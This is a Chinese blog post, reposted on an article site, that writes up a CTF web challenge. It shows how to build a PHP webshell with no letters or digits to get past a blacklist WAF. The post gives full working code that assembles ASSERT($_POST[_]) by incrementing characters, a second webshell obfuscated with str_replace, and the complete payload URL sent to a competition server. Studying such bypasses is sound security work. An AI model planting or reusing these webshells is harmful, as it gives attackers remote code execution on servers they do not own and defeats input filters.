美文网首页
湖湘杯 web300 【花样绕waf】【shell的一百种写

湖湘杯 web300 【花样绕waf】【shell的一百种写

作者: EEE渐渐遗忘者 | 来源:发表于2017-12-02 17:40 被阅读0次

    源码

    (转自【https://chybeta.github.io/2017/07/15/一道好玩的webshell题/】)

    最早在p神博客上看见的:

    【https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html#_4】

    源码

    发现 黑名单几乎禁用了所有的的字符.....

    写到这里突然还想到之前碰见的这种webshell(当然这里用不了啊,waf肯定就拦住了)

    <?php$k = str_replace("8","","a8s88s8e8r8t");$k($_POST["8"]); ?>

    利用str_replace 替换8  

    那么问题来了:

    如何编写一个不使用数字和字母的webshell:

    通过连续定义变量

    $a='abc';

    $a.='def';

    此时$a=‘abcdef'

    通过这样,

    <?php

    $_=[];

    $_=@"$_"; // $_='Array';

    $_=$_['!'=='@']; // $_=$_[0];

    $___=$_; // A

    $__=$_;

    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;

    $___.=$__; // S

    $___.=$__; // S

    $__=$_;

    $__++;$__++;$__++;$__++; // E

    $___.=$__;

    $__=$_;

    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R

    $___.=$__;

    $__=$_;

    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

    $___.=$__;

    $____='_';

    $__=$_;

    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P

    $____.=$__;

    $__=$_;

    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O

    $____.=$__;

    $__=$_;

    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S

    $____.=$__;

    $__=$_;

    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

    $____.=$__;

    $_=$$____;

    $___($_[_]); // ASSERT($_POST[_]);

    http://114.215.71.135:10080/?

    content=$_='';$_[+$_]++;$_=$_.'';$__=$_[+''];$_=$__;$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

    直接连接成功

    相关文章

      网友评论

          本文标题:湖湘杯 web300 【花样绕waf】【shell的一百种写

          本文链接:https://www.haomeiwen.com/subject/bbavbxtx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|湖湘杯 web300 【花样绕waf】【shell的一百种写|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!